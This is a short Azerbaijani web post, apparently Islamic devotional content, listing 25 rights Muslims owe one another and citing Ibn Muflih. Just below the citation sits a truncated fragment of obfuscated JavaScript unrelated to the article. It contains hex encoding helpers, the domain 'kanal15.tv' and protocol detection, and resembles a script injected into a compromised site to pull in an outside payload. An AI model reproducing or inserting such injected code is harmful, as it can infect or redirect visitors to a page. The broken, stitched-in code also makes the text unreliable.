İNSANLARIN, SƏNİN ÜZƏRİNDƏKİ 25 HAQQI

0
159

Əziz müsəlman! Vəzifələrimizdən biri də, insanlara qarşı gözəl davranmaq, onların haqlarına riayət etməkdir. Müsəlmanın, müsəlman üzərində haqlarından bəziləri bunlardır:

 

🔹Eybinin/nöqsanının üzərini ortməsi;

🔹Xətasını bağışlaması;

🔹Gözünün yaşına rəhm etməsi;

🔹Səhvininin üzərindən keç;

🔹Üzrünü qəbul et;

🔹Haqqında qeybət edilməsinə izn vermə;

🔹Daima nəsihət et;

🔹Dostluğunu qoru;

🔹Tapşırığını/xahişini yerinə yetir;

🔹Dəvətinə icabət et/qəbul et;

🔹Hədiyyəsini qəbul et;

🔹Əlaqələri gücləndir;

🔹Etdiyi yaxşılığa görə təşəkkür et;

🔹Gözəl şəkildə köməklik et;

🔹Möhtac olduqda yardımına tələs (ehtiyacını ödə);

🔹Tanış olmaq istədikdə, tanışlıq ver;

🔹Asqırdıqda cavab ver (əlhəmdulilləh deyərsə, yərhəmukəllah -de);

🔹İtirdiyini tapmağa kömək et;

🔹Düşmənlik deyil, dostluq et;

🔹Zülmə məruz qalıbsa, zalıma qarşı ona kömək et;

🔹Başqasına zülm etməkdən də, çəkindir;

🔹və bu işdə onunla əsla razı olma;

🔹Onu alçaltma;

🔹Özün üçün arzuladığını, onun üçün də arzula;

🔹Özün üçün arzulamadığın bir şeyi, ona da rəva görmə..

 

 

İbn Muflih, “əl-Ədəb əş-Şəriyyə” (1/290)

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kanal15.tv"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Şərh

Şərh